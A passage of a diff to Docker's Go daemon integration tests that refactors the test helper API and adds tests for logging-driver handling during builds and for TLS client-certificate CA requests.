s.d.Cmd("run", "--ulimit", "nproc=2048", "--name=test", "busybox", "/bin/sh", "-c", "echo $(ulimit -n); echo $(ulimit -p)") if err != nil { @@ -1083,13 +983,11 @@ func (s *DockerDaemonSuite) TestDaemonUlimitDefaults(c *check.C) { c.Fatalf("expected `ulimit -n` to be `42`, got: %s", nofile) } if nproc != "2048" { - c.Fatalf("exepcted `ulimit -p` to be 2048, got: %s", nproc) + c.Fatalf("expected `ulimit -p` to be 2048, got: %s", nproc) } // Now restart daemon with a new default - if err := s.d.Restart("--default-ulimit", "nofile=43"); err != nil { - c.Fatal(err) - } + s.d.Restart(c, "--default-ulimit", "nofile=43") out, err = s.d.Cmd("start", "-a", "test") if err != nil { @@ -1107,15 +1005,13 @@ func (s *DockerDaemonSuite) TestDaemonUlimitDefaults(c *check.C) { c.Fatalf("expected `ulimit -n` to be `43`, got: %s", nofile) } if nproc != "2048" { - c.Fatalf("exepcted `ulimit -p` to be 2048, got: %s", nproc) + c.Fatalf("expected `ulimit -p` to be 2048, got: %s", nproc) } } // #11315 func (s *DockerDaemonSuite) TestDaemonRestartRenameContainer(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c) if out, err := s.d.Cmd("run", "--name=test", "busybox"); err != nil { c.Fatal(err, out) @@ -1125,9 +1021,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartRenameContainer(c *check.C) { c.Fatal(err, out) } - if err := s.d.Restart(); err != nil { - c.Fatal(err) - } + s.d.Restart(c) if out, err := s.d.Cmd("start", "test2"); err != nil { c.Fatal(err, out) @@ -1135,16 +1029,14 @@ func (s *DockerDaemonSuite) TestDaemonRestartRenameContainer(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefault(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline") c.Assert(err, check.IsNil, check.Commentf(out)) - id, err := s.d.getIDByName("test") + id, err := s.d.GetIDByName("test") c.Assert(err, check.IsNil) - logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log") + logPath := filepath.Join(s.d.Root, "containers", id, id+"-json.log") if _, err := os.Stat(logPath); err != nil { c.Fatal(err) @@ -1175,18 +1067,16 @@ func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefault(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefaultOverride(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--name=test", "--log-driver=none", "busybox", "echo", "testline") if err != nil { c.Fatal(out, err) } - id, err := s.d.getIDByName("test") + id, err := s.d.GetIDByName("test") c.Assert(err, check.IsNil) - logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log") + logPath := filepath.Join(s.d.Root, "containers", id, id+"-json.log") if _, err := os.Stat(logPath); err == nil || !os.IsNotExist(err) { c.Fatalf("%s shouldn't exits, error on Stat: %s", logPath, err) @@ -1194,18 +1084,16 @@ func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefaultOverride(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonLoggingDriverNone(c *check.C) { - if err := s.d.StartWithBusybox("--log-driver=none"); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c, "--log-driver=none") out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline") if err != nil { c.Fatal(out, err) } - id, err := s.d.getIDByName("test") + id, err := s.d.GetIDByName("test") c.Assert(err, check.IsNil) - logPath := filepath.Join(s.d.folder, "graph", "containers", id, id+"-json.log") + logPath := filepath.Join(s.d.Root, "containers", id, id+"-json.log") if _, err := os.Stat(logPath); err == nil || !os.IsNotExist(err) { c.Fatalf("%s shouldn't exits, error on Stat: %s", logPath, err) @@ -1213,18 +1101,16 @@ func (s *DockerDaemonSuite) TestDaemonLoggingDriverNone(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneOverride(c *check.C) { - if err := s.d.StartWithBusybox("--log-driver=none"); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c, "--log-driver=none") out, err := s.d.Cmd("run", "--name=test", "--log-driver=json-file", "busybox", "echo", "testline") if err != nil { c.Fatal(out, err) } - id, err := s.d.getIDByName("test") + id, err := s.d.GetIDByName("test") c.Assert(err, check.IsNil) - logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log") + logPath := filepath.Join(s.d.Root, "containers", id, id+"-json.log") if _, err := os.Stat(logPath); err != nil { c.Fatal(err) @@ -1255,17 +1141,32 @@ func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneOverride(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneLogsError(c *check.C) { - c.Assert(s.d.StartWithBusybox("--log-driver=none"), checker.IsNil) + s.d.StartWithBusybox(c, "--log-driver=none") out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline") c.Assert(err, checker.IsNil, check.Commentf(out)) out, err = s.d.Cmd("logs", "test") c.Assert(err, check.NotNil, check.Commentf("Logs should fail with 'none' driver")) - expected := `"logs" command is supported only for "json-file" and "journald" logging drivers (got: none)` + expected := `configured logging driver does not support reading` c.Assert(out, checker.Contains, expected) } +func (s *DockerDaemonSuite) TestDaemonLoggingDriverShouldBeIgnoredForBuild(c *check.C) { + s.d.StartWithBusybox(c, "--log-driver=splunk") + + result := cli.BuildCmd(c, "busyboxs", cli.Daemon(s.d), + build.WithDockerfile(` + FROM busybox + RUN echo foo`), + build.WithoutCache, + ) + comment := check.Commentf("Failed to build image. output %s, exitCode %d, err %v", result.Combined(), result.ExitCode, result.Error) + c.Assert(result.Error, check.IsNil, comment) + c.Assert(result.ExitCode, check.Equals, 0, comment) + c.Assert(result.Combined(), checker.Contains, "foo", comment) +} + func (s *DockerDaemonSuite) TestDaemonUnixSockCleanedUp(c *check.C) { dir, err := ioutil.TempDir("", "socket-cleanup-test") if err != nil { @@ -1274,17 +1175,13 @@ func (s *DockerDaemonSuite) TestDaemonUnixSockCleanedUp(c *check.C) { defer os.RemoveAll(dir) sockPath := filepath.Join(dir, "docker.sock") - if err := s.d.Start("--host", "unix://"+sockPath); err != nil { - c.Fatal(err) - } + s.d.Start(c, "--host", "unix://"+sockPath) if _, err := os.Stat(sockPath); err != nil { c.Fatal("socket does not exist") } - if err := s.d.Stop(); err != nil { - c.Fatal(err) - } + s.d.Stop(c) if _, err := os.Stat(sockPath); err == nil || !os.IsNotExist(err) { c.Fatal("unix socket is not cleaned up") @@ -1302,13 +1199,8 @@ func (s *DockerDaemonSuite) TestDaemonWithWrongkey(c *check.C) { } os.Remove("/etc/docker/key.json") - if err := s.d.Start(); err != nil { - c.Fatalf("Failed to start daemon: %v", err) - } - - if err := s.d.Stop(); err != nil { - c.Fatalf("Could not stop daemon: %v", err) - } + s.d.Start(c) + s.d.Stop(c) config := &Config{} bytes, err := ioutil.ReadFile("/etc/docker/key.json") @@ -1337,11 +1229,12 @@ func (s *DockerDaemonSuite) TestDaemonWithWrongkey(c *check.C) { defer os.Remove("/etc/docker/key.json") - if err := s.d.Start(); err == nil { + if err := s.d.StartWithError(); err == nil { c.Fatalf("It should not be successful to start daemon with wrong key: %v", err) } - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) if !strings.Contains(string(content), "Public Key ID does not match") { c.Fatalf("Missing KeyID message from daemon logs: %s", string(content)) @@ -1349,9 +1242,7 @@ func (s *DockerDaemonSuite) TestDaemonWithWrongkey(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartKillWait(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-id", "busybox", "/bin/cat") if err != nil { @@ -1363,9 +1254,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartKillWait(c *check.C) { c.Fatalf("Could not kill %s: err=%v\n%s", containerID, err, out) } - if err := s.d.Restart(); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c) errchan := make(chan error) go func() { @@ -1391,14 +1280,17 @@ func (s *DockerDaemonSuite) TestHTTPSInfo(c *check.C) { testDaemonHTTPSAddr = "tcp://localhost:4271" ) - if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", - "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.Start(c, + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem", + "-H", testDaemonHTTPSAddr) args := []string{ "--host", testDaemonHTTPSAddr, - "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/client-cert.pem", "--tlskey", "fixtures/https/client-key.pem", "info", @@ -1416,10 +1308,8 @@ func (s *DockerDaemonSuite) TestHTTPSRun(c *check.C) { testDaemonHTTPSAddr = "tcp://localhost:4271" ) - if err := s.d.StartWithBusybox("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", - "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.StartWithBusybox(c, "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr) args := []string{ "--host", testDaemonHTTPSAddr, @@ -1454,14 +1344,17 @@ func (s *DockerDaemonSuite) TestHTTPSInfoRogueCert(c *check.C) { testDaemonHTTPSAddr = "tcp://localhost:4271" ) - if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", - "--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.Start(c, + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/server-cert.pem", + "--tlskey", "fixtures/https/server-key.pem", + "-H", testDaemonHTTPSAddr) args := []string{ "--host", testDaemonHTTPSAddr, - "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/client-rogue-cert.pem", "--tlskey", "fixtures/https/client-rogue-key.pem", "info", @@ -1479,14 +1372,17 @@ func (s *DockerDaemonSuite) TestHTTPSInfoRogueServerCert(c *check.C) { errCaUnknown = "x509: certificate signed by unknown authority" testDaemonRogueHTTPSAddr = "tcp://localhost:4272" ) - if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-rogue-cert.pem", - "--tlskey", "fixtures/https/server-rogue-key.pem", "-H", testDaemonRogueHTTPSAddr); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.Start(c, + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", + "--tlscert", "fixtures/https/server-rogue-cert.pem", + "--tlskey", "fixtures/https/server-rogue-key.pem", + "-H", testDaemonRogueHTTPSAddr) args := []string{ "--host", testDaemonRogueHTTPSAddr, - "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", + "--tlsverify", + "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/client-rogue-cert.pem", "--tlskey", "fixtures/https/client-rogue-key.pem", "info", @@ -1497,10 +1393,10 @@ func (s *DockerDaemonSuite) TestHTTPSInfoRogueServerCert(c *check.C) { } } -func pingContainers(c *check.C, d *Daemon, expectFailure bool) { +func pingContainers(c *check.C, d *daemon.Daemon, expectFailure bool) { var dargs []string if d != nil { - dargs = []string{"--host", d.sock()} + dargs = []string{"--host", d.Sock()} } args := append(dargs, "run", "-d", "--name", "container1", "busybox", "top") @@ -1522,72 +1418,78 @@ func pingContainers(c *check.C, d *Daemon, expectFailure bool) { } func (s *DockerDaemonSuite) TestDaemonRestartWithSocketAsVolume(c *check.C) { - c.Assert(s.d.StartWithBusybox(), check.IsNil) + s.d.StartWithBusybox(c) - socket := filepath.Join(s.d.folder, "docker.sock") + socket := filepath.Join(s.d.Folder, "docker.sock") out, err := s.d.Cmd("run", "--restart=always", "-v", socket+":/sock", "busybox") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) - c.Assert(s.d.Restart(), check.IsNil) + s.d.Restart(c) } // os.Kill should kill daemon ungracefully, leaving behind container mounts. -// A subsequent daemon restart shoud clean up said mounts. +// A subsequent daemon restart should clean up said mounts. func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonAndContainerKill(c *check.C) { - c.Assert(s.d.StartWithBusybox(), check.IsNil) + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + d.StartWithBusybox(c) - out, err := s.d.Cmd("run", "-d", "busybox", "top") + out, err := d.Cmd("run", "-d", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) id := strings.TrimSpace(out) - c.Assert(s.d.cmd.Process.Signal(os.Kill), check.IsNil) + + // If there are no mounts with container id visible from the host + // (as those are in container's own mount ns), there is nothing + // to check here and the test should be skipped. mountOut, err := ioutil.ReadFile("/proc/self/mountinfo") c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) + if !strings.Contains(string(mountOut), id) { + d.Stop(c) + c.Skip("no container mounts visible in host ns") + } - // container mounts should exist even after daemon has crashed. - comment := check.Commentf("%s should stay mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) - c.Assert(strings.Contains(string(mountOut), id), check.Equals, true, comment) + // kill the daemon + c.Assert(d.Kill(), check.IsNil) // kill the container - runCmd := exec.Command(ctrBinary, "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", "containers", "kill", id) - if out, ec, err := runCommandWithOutput(runCmd); err != nil { - c.Fatalf("Failed to run ctr, ExitCode: %d, err: %v output: %s id: %s\n", ec, err, out, id) - } + icmd.RunCommand(ctrBinary, "--address", "/var/run/docker/containerd/docker-containerd.sock", + "--namespace", moby_daemon.ContainersNamespace, "tasks", "kill", id).Assert(c, icmd.Success) // restart daemon. - if err := s.d.Restart(); err != nil { - c.Fatal(err) - } + d.Restart(c) // Now, container mounts should be gone. mountOut, err = ioutil.ReadFile("/proc/self/mountinfo") c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) - comment = check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, d.Root, mountOut) c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment) + + d.Stop(c) } // os.Interrupt should perform a graceful daemon shutdown and hence cleanup mounts. func (s *DockerDaemonSuite) TestCleanupMountsAfterGracefulShutdown(c *check.C) { - c.Assert(s.d.StartWithBusybox(), check.IsNil) + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + d.StartWithBusybox(c) - out, err := s.d.Cmd("run", "-d", "busybox", "top") + out, err := d.Cmd("run", "-d", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) id := strings.TrimSpace(out) // Send SIGINT and daemon should clean up - c.Assert(s.d.cmd.Process.Signal(os.Interrupt), check.IsNil) + c.Assert(d.Signal(os.Interrupt), check.IsNil) // Wait for the daemon to stop. - c.Assert(<-s.d.wait, checker.IsNil) + c.Assert(<-d.Wait, checker.IsNil) mountOut, err := ioutil.ReadFile("/proc/self/mountinfo") c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) - comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, d.Root, mountOut) c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment) } func (s *DockerDaemonSuite) TestRunContainerWithBridgeNone(c *check.C) { testRequires(c, DaemonIsLinux, NotUserNamespace) - c.Assert(s.d.StartWithBusybox("-b", "none"), check.IsNil) + s.d.StartWithBusybox(c, "-b", "none") out, err := s.d.Cmd("run", "--rm", "busybox", "ip", "l") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) @@ -1614,16 +1516,12 @@ func (s *DockerDaemonSuite) TestRunContainerWithBridgeNone(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartWithContainerRunning(t *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - t.Fatal(err) - } + s.d.StartWithBusybox(t) if out, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top"); err != nil { t.Fatal(out, err) } - if err := s.d.Restart(); err != nil { - t.Fatal(err) - } + s.d.Restart(t) // Container 'test' should be removed without error if out, err := s.d.Cmd("rm", "test"); err != nil { t.Fatal(out, err) @@ -1631,9 +1529,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithContainerRunning(t *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartCleanupNetns(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--name", "netns", "-d", "busybox", "top") if err != nil { c.Fatal(out, err) @@ -1651,51 +1547,50 @@ func (s *DockerDaemonSuite) TestDaemonRestartCleanupNetns(c *check.C) { } // Test if the file still exists - out, _, err = runCommandWithOutput(exec.Command("stat", "-c", "%n", fileName)) - out = strings.TrimSpace(out) - c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) - c.Assert(out, check.Equals, fileName, check.Commentf("Output: %s", out)) + icmd.RunCommand("stat", "-c", "%n", fileName).Assert(c, icmd.Expected{ + Out: fileName, + }) // Remove the container and restart the daemon if out, err := s.d.Cmd("rm", "netns"); err != nil { c.Fatal(out, err) } - if err := s.d.Restart(); err != nil { - c.Fatal(err) - } + s.d.Restart(c) // Test again and see now the netns file does not exist - out, _, err = runCommandWithOutput(exec.Command("stat", "-c", "%n", fileName)) - out = strings.TrimSpace(out) - c.Assert(err, check.Not(check.IsNil), check.Commentf("Output: %s", out)) + icmd.RunCommand("stat", "-c", "%n", fileName).Assert(c, icmd.Expected{ + Err: "No such file or directory", + ExitCode: 1, + }) } // tests regression detailed in #13964 where DOCKER_TLS_VERIFY env is ignored func (s *DockerDaemonSuite) TestDaemonTLSVerifyIssue13964(c *check.C) { host := "tcp://localhost:4271" - c.Assert(s.d.Start("-H", host), check.IsNil) - cmd := exec.Command(dockerBinary, "-H", host, "info") - cmd.Env = []string{"DOCKER_TLS_VERIFY=1", "DOCKER_CERT_PATH=fixtures/https"} - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, check.Not(check.IsNil), check.Commentf("%s", out)) - c.Assert(strings.Contains(out, "error during connect"), check.Equals, true) - + s.d.Start(c, "-H", host) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "-H", host, "info"}, + Env: []string{"DOCKER_TLS_VERIFY=1", "DOCKER_CERT_PATH=fixtures/https"}, + }).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "error during connect", + }) } func setupV6(c *check.C) { // Hack to get the right IPv6 address on docker0, which has already been created result := icmd.RunCommand("ip", "addr", "add", "fe80::1/64", "dev", "docker0") - result.Assert(c, icmd.Expected{}) + result.Assert(c, icmd.Success) } func teardownV6(c *check.C) { result := icmd.RunCommand("ip", "addr", "del", "fe80::1/64", "dev", "docker0") - result.Assert(c, icmd.Expected{}) + result.Assert(c, icmd.Success) } func (s *DockerDaemonSuite) TestDaemonRestartWithContainerWithRestartPolicyAlways(c *check.C) { - c.Assert(s.d.StartWithBusybox(), check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-d", "--restart", "always", "busybox", "top") c.Assert(err, check.IsNil) @@ -1710,7 +1605,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithContainerWithRestartPolicyAlway c.Assert(err, check.IsNil) c.Assert(out, check.Equals, "") - c.Assert(s.d.Restart(), check.IsNil) + s.d.Restart(c) out, err = s.d.Cmd("ps", "-q") c.Assert(err, check.IsNil) @@ -1718,9 +1613,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithContainerWithRestartPolicyAlway } func (s *DockerDaemonSuite) TestDaemonWideLogConfig(c *check.C) { - if err := s.d.StartWithBusybox("--log-opt=max-size=1k"); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c, "--log-opt=max-size=1k") name := "logtest" out, err := s.d.Cmd("run", "-d", "--log-opt=max-file=5", "--name", name, "busybox", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s, err: %v", out, err)) @@ -1736,18 +1629,14 @@ func (s *DockerDaemonSuite) TestDaemonWideLogConfig(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartWithPausedContainer(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c) if out, err := s.d.Cmd("run", "-i", "-d", "--name", "test", "busybox", "top"); err != nil { c.Fatal(err, out) } if out, err := s.d.Cmd("pause", "test"); err != nil { c.Fatal(err, out) } - if err := s.d.Restart(); err != nil { - c.Fatal(err) - } + s.d.Restart(c) errchan := make(chan error) go func() { @@ -1773,12 +1662,12 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPausedContainer(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartRmVolumeInUse(c *check.C) { - c.Assert(s.d.StartWithBusybox(), check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("create", "-v", "test:/foo", "busybox") c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(s.d.Restart(), check.IsNil) + s.d.Restart(c) out, err = s.d.Cmd("volume", "rm", "test") c.Assert(err, check.NotNil, check.Commentf("should not be able to remove in use volume after daemon restart")) @@ -1786,54 +1675,52 @@ func (s *DockerDaemonSuite) TestDaemonRestartRmVolumeInUse(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartLocalVolumes(c *check.C) { - c.Assert(s.d.Start(), check.IsNil) + s.d.Start(c) _, err := s.d.Cmd("volume", "create", "test") c.Assert(err, check.IsNil) - c.Assert(s.d.Restart(), check.IsNil) + s.d.Restart(c) _, err = s.d.Cmd("volume", "inspect", "test") c.Assert(err, check.IsNil) } +// FIXME(vdemeester) should be a unit test func (s *DockerDaemonSuite) TestDaemonCorruptedLogDriverAddress(c *check.C) { - c.Assert(s.d.Start("--log-driver=syslog", "--log-opt", "syslog-address=corrupted:42"), check.NotNil) - expected := "Failed to set log opts: syslog-address should be in form proto://address" - runCmd := exec.Command("grep", expected, s.d.LogFileName()) - if out, _, err := runCommandWithOutput(runCmd); err != nil { - c.Fatalf("Expected %q message; but doesn't exist in log: %q, err: %v", expected, out, err) - } + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + c.Assert(d.StartWithError("--log-driver=syslog", "--log-opt", "syslog-address=corrupted:42"), check.NotNil) + expected := "syslog-address should be in form proto://address" + icmd.RunCommand("grep", expected, d.LogFileName()).Assert(c, icmd.Success) } +// FIXME(vdemeester) should be a unit test func (s *DockerDaemonSuite) TestDaemonCorruptedFluentdAddress(c *check.C) { - c.Assert(s.d.Start("--log-driver=fluentd", "--log-opt", "fluentd-address=corrupted:c"), check.NotNil) - expected := "Failed to set log opts: invalid fluentd-address corrupted:c: " - runCmd := exec.Command("grep", expected, s.d.LogFileName()) - if out, _, err := runCommandWithOutput(runCmd); err != nil { - c.Fatalf("Expected %q message; but doesn't exist in log: %q, err: %v", expected, out, err) - } + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + c.Assert(d.StartWithError("--log-driver=fluentd", "--log-opt", "fluentd-address=corrupted:c"), check.NotNil) + expected := "invalid fluentd-address corrupted:c: " + icmd.RunCommand("grep", expected, d.LogFileName()).Assert(c, icmd.Success) } +// FIXME(vdemeester) Use a new daemon instance instead of the Suite one func (s *DockerDaemonSuite) TestDaemonStartWithoutHost(c *check.C) { - s.d.useDefaultHost = true + s.d.UseDefaultHost = true defer func() { - s.d.useDefaultHost = false + s.d.UseDefaultHost = false }() - c.Assert(s.d.Start(), check.IsNil) + s.d.Start(c) } -func (s *DockerDaemonSuite) TestDaemonStartWithDefalutTLSHost(c *check.C) { - s.d.useDefaultTLSHost = true +// FIXME(vdemeester) Use a new daemon instance instead of the Suite one +func (s *DockerDaemonSuite) TestDaemonStartWithDefaultTLSHost(c *check.C) { + s.d.UseDefaultTLSHost = true defer func() { - s.d.useDefaultTLSHost = false + s.d.UseDefaultTLSHost = false }() - if err := s.d.Start( + s.d.Start(c, "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem", - "--tlskey", "fixtures/https/server-key.pem"); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + "--tlskey", "fixtures/https/server-key.pem") // The client with --tlsverify should also use default host localhost:2376 tmpHost := os.Getenv("DOCKER_HOST") @@ -1854,6 +1741,33 @@ func (s *DockerDaemonSuite) TestDaemonStartWithDefalutTLSHost(c *check.C) { if !strings.Contains(out, "Server") { c.Fatalf("docker version should return information of server side") } + + // ensure when connecting to the server that only a single acceptable CA is requested + contents, err := ioutil.ReadFile("fixtures/https/ca.pem") + c.Assert(err, checker.IsNil) + rootCert, err := helpers.ParseCertificatePEM(contents) + c.Assert(err, checker.IsNil) + rootPool := x509.NewCertPool() + rootPool.AddCert(rootCert) + + var certRequestInfo *tls.CertificateRequestInfo + conn, err := tls.Dial("tcp", fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort), &tls.Config{ + RootCAs: rootPool, + GetClientCertificate: func(cri *tls.CertificateRequestInfo) (*tls.Certificate, error) { + certRequestInfo = cri + cert, err := tls.LoadX509KeyPair("fixtures/https/client-cert.pem", "fixtures/https/client-key.pem") + if err != nil { + return nil, err + } + return &cert, nil + }, + }) + c.Assert(err, checker.IsNil) + conn.Close() + + c.Assert(certRequestInfo, checker.NotNil) + c.Assert(certRequestInfo.AcceptableCAs, checker.HasLen, 1) + c.Assert(certRequestInfo.AcceptableCAs[0], checker.DeepEquals, rootCert.RawSubject) } func (s *DockerDaemonSuite) TestBridgeIPIsExcludedFromAllocatorPool(c *check.C) { @@ -1863,14 +1777,13 @@ func (s *DockerDaemonSuite) TestBridgeIPIsExcludedFromAllocatorPool(c *check.C) bridgeIP := "192.169.1.1" bridgeRange := bridgeIP + "/30" - err := s.d.StartWithBusybox("--bip", bridgeRange) - c.Assert(err, check.IsNil) - defer s.d.Restart() + s.d.StartWithBusybox(c, "--bip", bridgeRange) + defer s.d.Restart(c) var cont int for { contName := fmt.Sprintf("container%d", cont) - _, err = s.d.Cmd("run", "--name", contName, "-d", "busybox", "/bin/sleep", "2") + _, err := s.d.Cmd("run", "--name", contName, "-d", "busybox", "/bin/sleep", "2") if err != nil { // pool exhausted break @@ -1893,38 +1806,29 @@ func (s *DockerDaemonSuite) TestDaemonNoSpaceLeftOnDeviceError(c *check.C) { c.Assert(mount.MakeRShared(testDir), checker.IsNil) defer mount.Unmount(testDir) - // create a 2MiB image and mount it as graph root + // create a 3MiB image (with a 2MiB ext4 fs) and mount it as graph root // Why in a container? Because `mount` sometimes behaves weirdly and often fails outright on this test in debian:jessie (which is what the test suite runs under if run from the Makefile) - dockerCmd(c, "run", "--rm", "-v", testDir+":/test", "busybox", "sh", "-c", "dd of=/test/testfs.img bs=1M seek=2 count=0") - out, _, err := runCommandWithOutput(exec.Command("mkfs.ext4", "-F", filepath.Join(testDir, "testfs.img"))) // `mkfs.ext4` is not in busybox - c.Assert(err, checker.IsNil, check.Commentf(out)) - - cmd := exec.Command("losetup", "-f", "--show", filepath.Join(testDir, "testfs.img")) - loout, err := cmd.CombinedOutput() - c.Assert(err, checker.IsNil) - loopname := strings.TrimSpace(string(loout)) - defer exec.Command("losetup", "-d", loopname).Run() + dockerCmd(c, "run", "--rm", "-v", testDir+":/test", "busybox", "sh", "-c", "dd of=/test/testfs.img bs=1M seek=3 count=0") + icmd.RunCommand("mkfs.ext4", "-F", filepath.Join(testDir, "testfs.img")).Assert(c, icmd.Success) - dockerCmd(c, "run", "--privileged", "--rm", "-v", testDir+":/test:shared", "busybox", "sh", "-c", fmt.Sprintf("mkdir -p /test/test-mount && mount -t ext4 -no loop,rw %v /test/test-mount", loopname)) + dockerCmd(c, "run", "--privileged", "--rm", "-v", testDir+":/test:shared", "busybox", "sh", "-c", "mkdir -p /test/test-mount && mount -n /test/testfs.img /test/test-mount") defer mount.Unmount(filepath.Join(testDir, "test-mount")) - err = s.d.Start("--graph", filepath.Join(testDir, "test-mount")) - defer s.d.Stop() - c.Assert(err, check.IsNil) + s.d.Start(c, "--data-root", filepath.Join(testDir, "test-mount")) + defer s.d.Stop(c) - // pull a repository large enough to fill the mount point - pullOut, err := s.d.Cmd("pull", "registry:2") + // pull a repository large enough to overfill the mounted filesystem + pullOut, err := s.d.Cmd("pull", "debian:stretch") c.Assert(err, checker.NotNil, check.Commentf(pullOut)) c.Assert(pullOut, checker.Contains, "no space left on device") } // Test daemon restart with container links + auto restart func (s *DockerDaemonSuite) TestDaemonRestartContainerLinksRestart(c *check.C) 